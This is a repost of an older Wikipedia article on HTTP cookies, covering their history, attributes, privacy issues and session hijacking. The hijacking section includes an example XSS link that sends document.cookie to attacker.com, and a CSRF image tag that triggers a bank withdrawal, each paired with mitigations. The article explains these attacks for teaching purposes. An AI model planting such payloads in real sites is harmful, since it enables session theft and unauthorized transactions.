HTTP cookie

来源:互联网 发布:苏亚雷斯数据 编辑:程序博客网 时间:2024/05/05 20:22

from http://en.wikipedia.org/wiki/HTTP_cookie#Session_cookie

 

A cookie, also known as a HTTP cookie, web cookie, or browser cookie,is used for an origin website to send state information to a user'sbrowser and for the browser to return the state information to theorigin site.[1] The state information can be used for authentication, identification of a user session, user's preferences, shopping cart contents, or anything else that can be accomplished through storing text data.

Cookies are not software. They can't be programmed, can't carryviruses, and can't unleash malware to go wilding through your harddrive.[2] However, they can be used by spyware to track user's browsing activities – a major privacy concern that prompted Europe and US law makers to take actions.[3] [4] Cookies could also be stolen by hackers to gain access to a victim's web account.[5]

Contents

[hide]
  • 1 History
  • 2 Terminologies
    • 2.1 Session cookie
    • 2.2 Persistent cookie
    • 2.3 Secure cookie
    • 2.4 HttpOnly cookie
    • 2.5 Third-party cookie
    • 2.6 Super cookie
    • 2.7 Zombie cookie
  • 3 Uses
    • 3.1 Session management
    • 3.2 Personalization
    • 3.3 Tracking
  • 4 Implementation
    • 4.1 Setting a cookie
    • 4.2 Cookie attributes
      • 4.2.1 Domain and Path
      • 4.2.2 Expires and Max-Age
      • 4.2.3 Secure and HttpOnly
  • 5 Browser settings
  • 6 Privacy and third-party cookies
  • 7 Cookie theft and session hijacking
    • 7.1 Network eavesdropping
    • 7.2 Publishing false sub-domain – DNS cache poisoning
    • 7.3 Cross-site scripting – cookie theft
    • 7.4 Cross-site scripting – just do it
    • 7.5 Cross-site scripting – proxy request
    • 7.6 Cross-site Request Forgery
  • 8 Drawbacks of cookies
    • 8.1 Inaccurate identification
    • 8.2 Inconsistent state on client and server
  • 9 Alternatives to cookies
    • 9.1 IP address
    • 9.2 URL (query string)
    • 9.3 Hidden form fields
    • 9.4 window.name
    • 9.5 HTTP authentication
  • 10 See also
  • 11 References
  • 12 External links

[edit] History

The term "cookie" was derived from "magic cookie",which is the packet of data a program receives and sends againunchanged. Magic cookies were already used in computing when computerprogrammer Lou Montulli had the idea of using them in Web communications in June 1994.[6] At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for a customer. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart.[7][8]

Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape, released on October 13, 1994,[9][10]supported cookies. The first use of cookies (out of the labs) waschecking whether visitors to the Netscape website had already visitedthe site. Montulli applied for a patent for the cookie technology in1995, and US 5774670  was granted in 1998. Support for cookies was integrated in Internet Explorer in version 2, released in October 1995.[11]

The introduction of cookies was not widely known to the public atthe time. In particular, cookies were accepted by default, and userswere not notified of the presence of cookies. Some people were aware ofthe existence of cookies as early as the first quarter of 1995,[12] but the general public learned about them after the Financial Timespublished an article about them on February 12, 1996. In the same year,cookies received a lot of media attention, especially because ofpotential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission hearings in 1996 and 1997.

The development of the formal cookie specifications was alreadyongoing. In particular, the first discussions about a formalspecification started in April 1995 on the www-talk mailing list. Aspecial working group within the IETFwas formed. Two alternative proposals for introducing state in HTTPtransactions had been proposed by Brian Behlendorf and David Kristolrespectively, but the group, headed by Kristol himself, soon decided touse the Netscape specification as a starting point. On February 1996,the working group identified third-party cookies as a considerableprivacy threat. The specification produced by the group was eventuallypublished as RFC 2109 in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.

At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.

A definitive specification for cookies as used in the real world was a long time coming, but was finally published as RFC 6265 in April 2011.

[edit] Terminologies

[edit] Session cookie

A session cookie only lasts for the duration of users using thewebsite. A web browser normally deletes session cookies when it quits.A session cookie expires if the user does not access the website for aperiod of time chosen by the server (idle timeout).

[edit] Persistent cookie

A persistent cookie will outlast user sessions. If a persistentcookie has its Max-Age set to 1 year, then, within the year, theinitial value set in that cookie would be sent back to server everytime the user visits the server. This could be used to record a vitalpiece of information such as how the user initially came to thiswebsite. For this reason, persistent cookies are also called trackingcookies.

[edit] Secure cookie

A secure cookie is only used when a browser is visiting a server viaHTTPS, ensuring that the cookie is always encrypted when transmittingfrom client to server. This makes the cookie less likely to be exposedto cookie theft via eavesdropping.

[edit] HttpOnly cookie

The HttpOnly cookie is supported by most modern browsers.[13]On a supported browser, a HttpOnly cookie will only be used whentransmitting HTTP (or HTTPS) requests. In addition, the cookie value isnot available to client side script (such as Javascript), therebymitigating the threat of cookie theft via Cross-site scripting.

[edit] Third-party cookie

First-party cookies are cookies set with the same domain (or itssubdomain) in your browser's address bar. Third-party cookies arecookies being set with different domains than the one shown on theaddress bar.

For example: Suppose a user visits www.example1.com, which sets a cookie with the domain ad.foxytracking.com. When the user later visits www.example2.com, another cookie is set with the domain ad.foxytracking.com.Eventually, both of these cookies will be sent to the advertiser whenloading their ads or visiting their website. The advertiser can thenuse these cookies to build up a browsing history of the user across allthe websites this advertiser has footprints on.

See Privacy and Third-party cookies below for more.

[edit] Super cookie

A Super cookie is a cookie with a Public Suffix[14] domain, like .com, .co.uk or k12.ca.us.

Most browsers, by default, allow first-party cookies—a cookie withdomain to be the same or sub-domain of the requesting host. Forexample, a user visiting www.example.com can have a cookie set with domain www.example.com or .example.com, but not .com. A super cookie with domain .com would be blocked by browsers; otherwise, a malicious website, like attacker.com, could set a super cookie with domain .com and potentially disrupt or impersonate legitimate user requests to example.com.Unfortunately, the Public Suffix List keeps changing. Older versions ofbrowsers will not have the most up-to-date list, and will therefore bevulnerable to certain super cookies.

[edit] Zombie cookie

A zombie cookie is any cookie that is automatically recreated aftera user has deleted it. This is accomplished by a script storing thecontent of the cookie in some other locations, such as the localstorage available to Flash content, HTML5 storages and other clientside mechanisms, and then recreating the cookie from backup stores whenthe cookie's absence is detected.

[edit] Uses

[edit] Session management

Cookies may be used to maintain data related to the user duringnavigation, possibly across multiple visits. Cookies were introduced toprovide a way to implement a "shopping cart" (or "shopping basket"),[7][8] a virtual device into which users can store items they want to purchase as they navigate throughout the site.

Shopping basket applications today usually store the list of basketcontents in a database on the server side, rather than storing basketitems in the cookie itself. A web server typically sends a cookiecontaining a unique session identifier.The web browser will send back that session identifier with eachsubsequent request and shopping basket items are stored associated witha unique session identifier.

Allowing users to log in to a website is a frequent use of cookies.Typically the web server will first send a cookie containing a uniquesession identifier. Users then submit their credentials and the webapplication authenticates the session and allows the user access toservices.

[edit] Personalization

Cookies may be used to remember the information about the user whohas visited a website in order to show relevant content in the future.For example a web server may send a cookie containing the username lastused to log in to a web site so that it may be filled in for futurevisits.

Many websites use cookies for personalizationbased on users' preferences. Users select their preferences by enteringthem in a web form and submitting the form to the server. The serverencodes the preferences in a cookie and sends the cookie back to thebrowser. This way, every time the user accesses a page, the server isalso sent the cookie where the preferences are stored, and canpersonalize the page according to the user preferences. For example,the Wikipedia website allows authenticated users to choose the webpage skin they like best; the Google search engine allows users (even non-registered ones) to decide how many search results per page they want to see.

[edit] Tracking

Tracking cookies may be used to track internet users' web browsing habits. This can also be done in part by using the IP address of the computer requesting the page or the referrer field of the HTTP request header, but cookies allow for greater precision. This can be demonstrated as follows:

  1. If the user requests a page of the site, but the request containsno cookie, the server presumes that this is the first page visited bythe user; the server creates a random string and sends it as a cookieback to the browser together with the requested page;
  2. From this point on, the cookie will be automatically sent by thebrowser to the server every time a new page from the site is requested;the server sends the page as usual, but also stores the URL of therequested page, the date/time of the request, and the cookie in a logfile.

By looking at the log file, it is then possible to find out which pages the user has visited and in what sequence.

[edit] Implementation

A possible interaction between a Web browser and a server holding a Webpage, in which the server sends a cookie to the browser and the browsersends it back when requesting another page.

Cookies are arbitrary pieces of data chosen by the Web server and sent to the browser. The browser returns them unchanged to the server, introducing a state (memory of previous events) into otherwise stateless HTTP transactions. Without cookies, each retrieval of a Web pageor component of a Web page is an isolated event, mostly unrelated toall other views of the pages of the same site. Other than being set bya web server, cookies can also be set by a script in a language such as JavaScript, if supported and enabled by the Web browser.

Cookie specifications[13][15][16]suggest that browsers should be able to save and send back a minimalnumber of cookies. In particular, an internet browser is expected to beable to store at least 300 cookies of four kilobytes each, and at least 20 cookies per server or domain.

[edit] Setting a cookie

Transfer of Web pages follows the HyperText Transfer Protocol (HTTP). Regardless of cookies, browsers request a page from web servers by sending them a usually short text called HTTP request.For example, to access the page http://www.example.org/index.html,browsers connect to the server www.example.org sending it a requestthat looks like the following one:

GET /index.html HTTP/1.1
Host: www.example.org

browser-------→server

The server replies by sending the requested page preceded by a similar packet of text, called 'HTTP response'. This packet may contain lines requesting the browser to store cookies:

HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value
Set-Cookie: name2=value2; Expires=Wed, 09 Jun 2021 10:18:14 GMT
 
(content of page)

browser←-------server

The server sends lines of Set-Cookie only if the server wishes the browser to store cookies. Set-Cookieis a directive for the browser to store the cookie and send it back infuture requests to the server (subject to expiration time or other cookie attributes),if the browser supports cookies and cookies are enabled. For example,the browser requests the page http://www.example.org/spec.html bysending the server www.example.org a request like the following:

GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: name=value; name2=value2
Accept: */*
 

browser-------→server

This is a request for another page from the same server, and differsfrom the first one above because it contains the string that the serverhas previously sent to the browser. This way, the server knows thatthis request is related to the previous one. The server answers bysending the requested page, possibly adding other cookies as well.

The value of a cookie can be modified by the server by sending a new Set-Cookie: name=newvalue line in response of a page request. The browser then replaces the old value with the new one.

The term "cookie crumb" is sometimes used to refer to the name-value pair.[17] This is not the same as breadcrumb web navigation,which is the technique of showing in each page the list of pages theuser has previously visited; this technique, however, may beimplemented using cookies.

Cookies can also be set by JavaScript or similar scripts running within the browser. In JavaScript, the object document.cookie is used for this purpose. For example, the instruction document.cookie = "temperature=20" creates a cookie of name temperature and value 20.[18]

[edit] Cookie attributes

Besides the name-value pair, servers can also set these cookieattributes: a cookie domain, a path, expiration time or maximum age,secure flag and httponly flag. Browsers will not send cookie attributesback to the server. They will only send the cookie’s name-value pair.Cookie attributes are used by browsers to determine when to delete acookie, block a cookie or whether to send a cookie (name-value pair) tothe servers.

[edit] Domain and Path

The cookie domain and path define the scope of the cookie—they tellthe browser that cookies should only be sent back to the server for thegiven domain and path. If not specified, they default to the domain andpath of the object that was requested. An example of Set-Cookiedirectives from a website after a user logged in:

Set-Cookie: LSID=DQAAAK…Eaem_vYg; Domain=docs.foo.com; Path=/accounts; Expires=Wed, 13-Jan-2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVn….DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-2021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=Ap4P….GTEq; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-2021 22:23:01 GMT; Secure; HttpOnly
 ......

The first cookie LSID has default domain docs.foo.com and Path /accounts, which tells the browser to use the cookie only when requesting pages contained in docs.foo.com/accounts. The other 2 cookies HSID and SSID would be sent back by the browser while requesting any subdomain in .foo.com on any path, for example www.foo.com/.

[edit] Expires and Max-Age

The Expires directive tells the browser when to delete the cookie.It is specified in the form of “Wdy, DD-Mon-YYYY HH:MM:SS GMT”,indicating the exact date/time this cookie will expire. As analternative to setting cookie expiration as an absolute date/time, RFC 2965allows the use of the Max-Age attribute to set the cookie’s expirationas an interval of seconds in the future, relative to the time thebrowser received the cookie. An example of Set-Cookie directives from awebsite after a user logged in:

Set-Cookie: lu=Rg3vHJZnehYLjVg7qi3bZjzg; expires=Tue, 15-Jan-2013 21:47:38 GMT; path=/; domain=.foo.com; httponly
Set-Cookie: made_write_conn=1295214458; path=/; domain=.foo.com
Set-Cookie: reg_fb_gate=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.foo.com; httponly
 ......

The first cookie lu is set to expire sometime in 15-Jan-2013, it will be used by the client browser until that time. The second cookie made_write_conndoes not have an expiration date, making it a session cookie. It willbe deleted after the user closes his/her browser. The third cookie reg_fb_gate has its value changed to deleted,with an expiration time in the past. The browser will delete thiscookie right away – note that cookie will only be deleted when thedomain and path attributes in the Set-Cookie field match the values used when the cookie was created.

[edit] Secure and HttpOnly

Secure and HttpOnly attributes do not have a value field, theexistence of the attribute names serves as indications that the cookieis Secure or HttpOnly.

A Secure attribute tells the browser to only use this cookie via secure/encrypted connections, obviously, web servers should also set this cookie via secure channels, and therefore anyone eavesdropping on your communication would not pick up the cookie.

An HttpOnly attribute tells the browser to only use the cookie forthe HTTP protocol. The cookie is not visible to client side scripts,and therefore cannot be stolen via cross-site scripting (a pervasive attack technique[19]). As shown in previous examples, both Facebook and Google use HttpOnly attribute extensively.

[edit] Browser settings

Most modern browsers support cookies and allow the user to disable them. The following are common options:[20]

  1. To enable or disable cookies completely, so that they are always accepted or always blocked.
  2. To allow the user to see the cookies that are active with respect to a given page by typing javascript:alert(document.cookie) in the browser URLfield. Some browsers incorporate a cookie manager for the user to seeand selectively delete the cookies currently stored in the browser.
  3. By default, Internet Explorer allows only 3rd party cookies that are accompanied by a P3P "CP" (Compact Policy) field.[21]

Most browsers also allow a full wipe of private data including cookies. Add-on tools for managing cookie permissions also exist.[22][23][24][25]

[edit] Privacy and third-party cookies

Cookies have some important implications on the privacy and anonymity of Web users. While cookies are sent only to the server setting them or the server in the same Internet domain,a Web page may contain images or other components stored on servers inother domains. Cookies that are set during retrieval of thesecomponents are called third-party cookies. The standards for cookies, RFC 2109 and RFC 2965, specify that browsers should protect user privacy and not allow third-party cookies by default. But most browsers, such as Mozilla Firefox, Internet Explorer, Opera and Google Chrome do allow third-party cookies by default, as long as the third-party website has Compact Privacy Policy published.

In this fictional example, an advertising company has placed banners intwo Web sites. Hosting the banner images on its servers and usingthird-party cookies, the advertising company is able to track thebrowsing of users across these two sites.

Advertising companies use third-party cookies to track a user acrossmultiple sites. In particular, an advertising company can track a useracross all pages where it has placed advertising images or web bugs.Knowledge of the pages visited by a user allows the advertising companyto target advertisements to the user's presumed preferences.

Website operators who do not disclose third-party cookie use toconsumers run the risk of harming consumer trust if cookie use isdiscovered. Having clear disclosure (such as in a privacy policy) tendsto eliminate any negative effects of such cookie discovery.[26]

The possibility of building a profile of users is considered by somea potential privacy threat, especially when tracking is done acrossmultiple domains using third-party cookies. For this reason, somecountries have legislation about cookies.

The United States government has set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy officeused cookies to track computer users viewing its online anti-drugadvertising. In 2002, privacy activist Daniel Brandt found that the CIAhad been leaving persistent cookies on computers which had visited itsweb site. When notified it was violating policy, CIA stated that thesecookies were not intentionally set and stopped setting them.[27] On December 25, 2005, Brandt discovered that the National Security Agencyhad been leaving two persistent cookies on visitors' computers due to asoftware upgrade. After being informed, the National Security Agencyimmediately disabled the cookies.[28]

The 2002 European Union telecommunication privacy Directive contains rules about the use of cookies.[29]In particular, Article 5, Paragraph 3 of this directive mandates thatstoring data (like cookies) in a user's computer can only be done if:

  1. the user is provided information about how this data is used;
  2. the user is given the possibility of denying this storingoperation. However, this article also states that storing data that isnecessary for technical reasons is exempted from this rule. Thisdirective was expected to have been applied since October 2003, but a December 2004 report says (page 38) that this provision was not applied in practice, and that some member countries (Slovakia, Latvia, Greece, Belgium, and Luxembourg) did not even implement the provision in national law. The same report suggests a thorough analysis of the situation in the Member States.

The P3Pspecification includes the possibility for a server to state a privacypolicy, which specifies which kind of information it collects and forwhich purpose. These policies include (but are not limited to) the useof information gathered using cookies. According to the P3Pspecification, a browser can accept or reject cookies by comparing theprivacy policy with the stored user preferences or ask the user,presenting them the privacy policy as declared by the server.

Many web browsers including Apple's Safari and Microsoft InternetExplorer versions 6 and 7 support P3P which allows the web browser todetermine whether to allow 3rd party cookies to be stored. The Operaweb browser allows users to refuse third-party cookies and to createglobal and specific security profiles for Internet domains.[30] Firefox 2.x dropped this option from its menu system but it restored it with the release of version 3.x.[31]

Third-party cookies can be blocked by most browsers to increaseprivacy and reduce tracking by advertising and tracking companieswithout negatively affecting the user's Web experience.[32]Many advertising operators have an opt-out option to behaviouraladvertising, with a generic cookie in the browser stopping behaviouraladvertising.[33]

[edit] Cookie theft and session hijacking

Most web sites use cookies as the only identifiers for usersessions, because other methods of identifying web users havelimitations and vulnerabilities. If a web site uses cookies as sessionidentifiers, attackers can impersonate users’ requests by stealing afull set of victims’ cookies. From the web server's point of view, arequest from an attacker has the same authentication as the victim’srequests; thus the request is performed on behalf of the victim’ssession.

Listed here are various scenarios of cookie theft and user sessionhijacking (even without stealing user cookies) which work with websites which rely solely on HTTP cookies for user identification.

[edit] Network eavesdropping

A cookie can be stolen by another computer that is allowed reading from the network

Traffic on a network can be intercepted and read by computers on thenetwork other than the sender and receiver (particularly over unencrypted open Wi-Fi). This traffic includes cookies sent on ordinary unencrypted HTTPsessions. Where network traffic is not encrypted, attackers cantherefore read the communications of other users on the network,including HTTP cookies as well as the entire contents of theconversations.

An attacker could use intercepted cookies to impersonate a user andperform a malicious task, such as transferring money out of thevictim’s bank account.

This issue can be resolved by securing the communication between the user's computer and the server by employing Transport Layer Security (HTTPS protocol) to encrypt the connection. A server can specify the Secureflag while setting a cookie, which will cause the browser to send thecookie only over an encrypted channel, such as an SSL connection.[13]

[edit] Publishing false sub-domain – DNS cache poisoning

Via DNS cache poisoning, an attacker might be able to cause a DNS server to cache a fabricated DNS entry, say f12345.www.example.com with the attacker’s server IP address. The attacker can then post an image URL from his own server (for example, http://f12345.www.example.com/img_4_cookie.jpg). Victims reading the attacker’s message would download this image from f12345.www.example.com. Since f12345.www.example.com is a sub-domain of www.example.com, victims’ browsers would submit all example.com-related cookies to the attacker’s server; the compromised cookies would also include HttpOnly cookies.

This vulnerability is usually for Internet Service Providers to fix, by securing their DNS servers. But it can also be mitigated if www.example.com is using Secure cookies. Victims’ browsers will not submit Secure cookies if the attacker’s image is not using encrypted connections. If the attacker chose to use HTTPS for his img_4_cookie.jpg download, he would have the challenge[34] of obtaining an SSL certificate for f12345.www.example.com from a Certificate Authority.Without a proper SSL certificate, victims’ browsers would display(usually very visible) warning messages about the invalid certificate,thus alerting victims as well as security officials from www.example.com.

[edit] Cross-site scripting – cookie theft

Cross-site scripting: a cookie that should be only exchanged between a server and a client is sent to another party.

Scripting languages such as JavaScript and JScriptare usually allowed to access cookie values and have some means to sendarbitrary values to arbitrary servers on the Internet. These facts areused in combination with sites allowing users to post HTML content thatother users can see.

As an example, an attacker may post a message on www.example.com with the following link:

<a href="#"
onclick="window.location='http://attacker.com/stole.cgi?text='+escape(document.cookie);
return false;">
Click here!</a>

When another user clicks on this link, the browser executes the piece of code within the onclick attribute, thus replacing the string document.cookie with the list of cookies of the user that are active for the page. As a result, this list of cookies is sent to the attacker.com server. If the attacker’s posting is on https://www.example.com/somewhere, secure cookies will also be sent to attacker.com in plain text.

Cross-site scripting is a constant threat, as there are always somecrackers trying to find a way of slipping in script tags to websites.It is the responsibility of the website developers to filter out suchmalicious code.

In the meantime, such attacks can be mitigated by using HttpOnlycookies. These cookies will not be accessible by client side script,and therefore the attacker will not be able to gather these cookies.

[edit] Cross-site scripting – just do it

If an attacker was able to insert a piece of script to a page on www.example.com,and a victim’s browser was able to execute the script, the script couldsimply carry out the attack. This attack would use victim’s browser tosend HTTP requests to servers directly; therefore, the victim’s browserwould submit all relevant cookies, including HttpOnly cookies, as well as Secure cookies if the script request is on HTTPS.

For example, on MySpace, Samy posted a short message “Samy is myhero” on his profile, with a hidden script to send Samy a “friendrequest” and then post the same message on the victim’s profile. A userreading Samy’s profile would send Samy a “friend request” and post thesame message on this person’s profile. Then, the third person readingthe second person’s profile would do the same. Pretty soon, this Samy worm became one of the fastest spreading viruses of all time.

This type of attack (with automated scripts) would not work if a website had CAPTCHA to challenge client requests.

[edit] Cross-site scripting – proxy request

In older version of browsers, there were security holes allowing attackers to script a proxy request by using XMLHttpRequest. For example, a victim is reading an attacker’s posting on www.example.com, and the attacker’s script is executed in the victim’s browser. The script generates a request to www.example.com with the proxy server attacker.com. Since the request is for www.example.com, all example.comcookies will be sent along with the request, but routed through theattacker’s proxy server, hence, the attacker can harvest victim’scookies.

This attack would not work for Secure cookie, since Secure cookies go with HTTPSconnections, and its protocol dictates end-to-end encryption, i.e., theinformation is encrypted on the user’s browser and decrypted on thedestination server www.example.com, so the proxy servers would only see encrypted bits and bytes.

[edit] Cross-site Request Forgery

For example, Bob might be browsing a chat forum where another user,Mallory, has posted a message. Suppose that Mallory has crafted an HTMLimage element that references an action on Bob's bank's website (ratherthan an image file), e.g.,

<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">

If Bob's bank keeps his authentication information in a cookie, andif the cookie hasn't expired, then the attempt by Bob's browser to loadthe image will submit the withdrawal form with his cookie, thusauthorizing a transaction without Bob's approval.

[edit] Drawbacks of cookies

Besides privacy concerns, cookies also have some technicaldrawbacks. In particular, they do not always accurately identify users,they can be used for security attacks, and they are often at odds withthe Representational State Transfer (REST) software architectural style.[35][36]

[edit] Inaccurate identification

If more than one browser is used on a computer, each usually has aseparate storage area for cookies. Hence cookies do not identify aperson, but a combination of a user account, a computer, and a Webbrowser. Thus, anyone who uses multiple accounts, computers, orbrowsers has multiple sets of cookies.

Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.

[edit] Inconsistent state on client and server

The use of cookies may generate an inconsistency between the stateof the client and the state as stored in the cookie. If the useracquires a cookie and then clicks the "Back" button of the browser, thestate on the browser is generally not the same as before thatacquisition. As an example, if the shopping cart of an online shop isbuilt using cookies, the content of the cart may not change when theuser goes back in the browser's history: if the user presses a buttonto add an item in the shopping cart and then clicks on the "Back"button, the item remains in the shopping cart. This might not be theintention of the user, who possibly wanted to undo the addition of theitem. This can lead to unreliability, confusion, and bugs. Webdevelopers should therefore be aware of this issue and implementmeasures to handle such situations as this.

[edit] Alternatives to cookies

Some of the operations that can be done using cookies can also be done using other mechanisms.

[edit] IP address

Users may be tracked based on the IP addressof the computer requesting the page. This technique has been availablesince the introduction of the World Wide Web, as downloading pagesrequires the server to know the IP address of the computer running thebrowser or the proxy,if any is used. The server can track this information whether or notcookies are used. However, these addresses are typically less reliablein identifying a user than cookies because computers and proxies may beshared by several users, and the same computer may be assigneddifferent IP addresses in different work sessions (as is often the casefor dial-up connections).

Tracking by IP addresses can be reliable in some situations, such asthe case of always-on broadband connections which retain the same IPaddress for long periods of time, so long as the power stays on.

Some systems such as Tor are designed to retain Internet anonymity and make tracking by IP address impractical or impossible.

IP addresses are in certain jurisdictions treated as Personally identifiable information and as such subject to use under legal restrictions.

[edit] URL (query string)

A more precise technique is based on embedding information into URLs. The query string part of the URL is the one that is typically used for this purpose, but other parts can be used as well. The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled.

This method consists of the Web server appending query strings tothe links of a Web page it holds when sending it to a browser. When theuser follows a link, the browser returns the attached query string tothe server.

Query strings used in this way and cookies are very similar, bothbeing arbitrary pieces of information chosen by the server and sentback by the browser. However, there are some differences: since a querystring is part of a URL, if that URL is later reused, the same attachedpiece of information is sent to the server. For example, if thepreferences of a user are encoded in the query string of a URL and theuser sends this URL to another user by e-mail, those preferences will be used for that other user as well.

Moreover, even if the same user accesses the same page two times,there is no guarantee that the same query string is used in both views.For example, if the same user arrives to the same page but coming froma page internal to the site the first time and from an external search engine the second time, the relative query strings are typically different while the cookies would be the same. For more details, see query string.

Other drawbacks of query strings are related to security: storingdata that identifies a session in a query string enables or simplifies session fixation attacks, referrer logging attacks and other security exploits. Transferring session identifiers as HTTP cookies is more secure.

[edit] Hidden form fields

Another form of session tracking is to use web formswith hidden fields. This technique is very similar to using URL querystrings to hold the information and has many of the same advantages anddrawbacks; and if the form is handled with the HTTPGET method, the fields actually become part of the URL the browser willsend upon form submission. But most forms are handled with HTTP POST,which causes the form information, including the hidden fields, to beappended as extra input that is neither part of the URL, nor of acookie.

This approach presents two advantages from the point of view of thetracker: first, having the tracking information placed in the HTMLsource and POST input rather than in the URL means it will not benoticed by the average user; second, the session information is notcopied when the user copies the URL (to save the page on disk or sendit via email, for example).

This method can be easily used with any framework that supports web forms.

[edit] window.name

All current web browsers can store a fairly large amount of data (2–32 MB) via JavaScript using the DOMproperty window.name. This data can be used instead of session cookiesand is also cross-domain. The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables[37] on the client side.

The downside is that every separate window or tab will initially have an empty window.name; in times of tabbed browsing this means that individually opened tabs (initiation by user) will not have a window name. Furthermore window.name can be used for tracking visitors across different web sites, making it of concern for Internet privacy.

In some respects this can be more secure than cookies due to not involving the server, so it is not vulnerable to networkcookie sniffing attacks. However if special measures are not taken toprotect the data, it is vulnerable to other attacks because the data isavailable across different web sites opened in the same window or tab.

[edit] HTTP authentication

The HTTP protocol includes the basic access authentication and the digest access authenticationprotocols, which allow access to a Web page only when the user hasprovided the correct username and password. If the server requires suchcredentials for granting access to a web page, the browser requeststhem from the user and, once obtained, the browser stores and sendsthem in every subsequent page request. This information can be used totrack the user.

[edit] See also

  • Dynamic HTML
  • Local Shared Object – Flash Cookies
  • Session Beans
  • Session (computer science)
  • Session ID
  • Web server session management
  • Web Storage and DOM Storage
  • Web visitor tracking
  • Zombie cookie
  • Evercookie

[edit] References

  1. ^ "HTTP State Management Mechanism – Overview". IETF. 2011-04. http://tools.ietf.org/html/rfc6265#section-3. 
  2. ^ Adam Penenberg. Cookie Monsters. Slate, November 7, 2005
  3. ^ "New net rules set to make cookies crumble". BBC. 2011-03-08. http://www.bbc.co.uk/news/technology-12668552. 
  4. ^ "Sen. Rockefeller: Get Ready for a Real Do-Not-Track Bill for Online Advertising". Adage.com. 2011-05-06. http://adage.com/article/digital/sen-rockefeller-ready-a-real-track-bill/227426/. 
  5. ^ Vamosi, Robert (2008-04-14). "Gmail cookie stolen via Google Spreadsheets". http://news.cnet.com/8301-10789_3-9918582-57.html. 
  6. ^ Schwartz, John (2001-09-04). "Giving Web a Memory Cost Its Users Privacy". The New York Times. http://www.nytimes.com/2001/09/04/technology/04COOK.html. 
  7. ^ a b Jey Kesan and Rajiv Shah. SSRN.com, Deconstructing Code. Chapter II.B (Netscape's cookies). Yale Journal of Law and Technology, 6, 277–389.
  8. ^ a b David Kristol. HTTP Cookies: Standards, privacy, and politics. ACM Transactions on Internet Technology, 1(2), 151–198, 2001. doi:10.1145/502152.502153 (an expanded version is freely available at arXiv:cs/0105018v1 [cs.SE])
  9. ^ "Press Release: Netscape Communications Offers New Network Navigator Free On The Internet". Web.archive.org. Archived from the original on 2006-12-07. http://web.archive.org/web/20061207145832/http://wp.netscape.com/newsref/pr/newsrelease1.html. Retrieved 2010-05-22. 
  10. ^ "Usenet Post by Marc Andreessen: Here it is, world!". Groups.google.com. 1994-10-13. http://groups.google.com/group/comp.infosystems.www.users/msg/9a210e5f72278328. Retrieved 2010-05-22. 
  11. ^ Hardmeier, Sandi (2005-08-25). "The history of Internet Explorer". Microsoft. http://www.microsoft.com/windows/IE/community/columns/historyofie.mspx. Retrieved 2009-01-04. 
  12. ^ Roger Clarke. Cookies
  13. ^ a b c IETF HTTP State Management Mechanism – Apr, 2011 Obsoletes RFC 2965.
  14. ^ Mozilla Foundation Public Suffix List
  15. ^ "Persistent client state HTTP cookies: Preliminary specification". Netscape. c1999. Archived from the original on 2007-08-05. http://web.archive.org/web/20070805052634/http://wp.netscape.com/newsref/std/cookie_spec.html. 
  16. ^ RFC 2965 – HTTP State Management Mechanism (IETF)
  17. ^ "Cookie Property". MSDN. Microsoft. http://msdn2.microsoft.com/en-us/library/ms533693.aspx. Retrieved 2009-01-04. 
  18. ^ Shannon, Ross (2007-02-26). "Cookies — set and retrieve information about your readers". HTMLSource. http://www.yourhtmlsource.com/javascript/cookies.html. Retrieved 2009-01-04. 
  19. ^ (PDF) Symantec Internet Security Threat Report: Trends for July–December 2007 (Executive Summary). XIII. Symantec Corp.. April 2008. pp. 1–3. http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_exec_summary_internet_security_threat_report_xiii_04-2008.en-us.pdf. Retrieved May 11, 2008. 
  20. ^ Whalen, David (June 8, 2002). "The Unofficial Cookie FAQ v2.6". Cookie Central. http://www.cookiecentral.com/faq/. Retrieved 2009-01-04. 
  21. ^ "3rd-Party Cookies, DOM Storage and Privacy". grack.com: Matt Mastracci's blog. January 6, 2010. http://grack.com/blog/2010/01/06/3rd-party-cookies-dom-storage-and-privacy/. Retrieved 2010-09-20. 
  22. ^ "How to Manage Cookies in Internet Explorer 6". Microsoft. December 18, 2007. http://support.microsoft.com/kb/283185. Retrieved 2009-01-04. 
  23. ^ "Clearing private data". Firefox Support Knowledge base. Mozilla. 16 September 2008. http://support.mozilla.com/en-US/kb/Clearing+Private+Data#top. Retrieved 2009-01-04. 
  24. ^ "Clear Personal Information : Clear browsing data". Google Chrome Help. Google. http://www.google.com/support/chrome/bin/answer.py?hl=en&answer=95582. Retrieved 2009-01-04. 
  25. ^ "Clear Personal Information: Delete cookies". Google Chrome Help. Google. http://www.google.com/support/chrome/bin/answer.py?hl=en&answer=95626. Retrieved 2009-01-04. 
  26. ^Miyazaki, Anthony D. (2008), “Online Privacy and the Disclosure ofCookie Use: Effects on Consumer Trust and Anticipated Patronage,”Journal of Public Policy & Marketing, 23 (Spring), 19–33.
  27. ^ "CIA Caught Sneaking Cookies". CBS News. 2002-03-20. http://www.cbsnews.com/stories/2002/03/20/tech/main504131.shtml. 
  28. ^ "Spy Agency Removes Illegal Tracking Files". The New York Times. 2005-12-29. http://www.nytimes.com/2005/12/29/national/29cookies.html. 
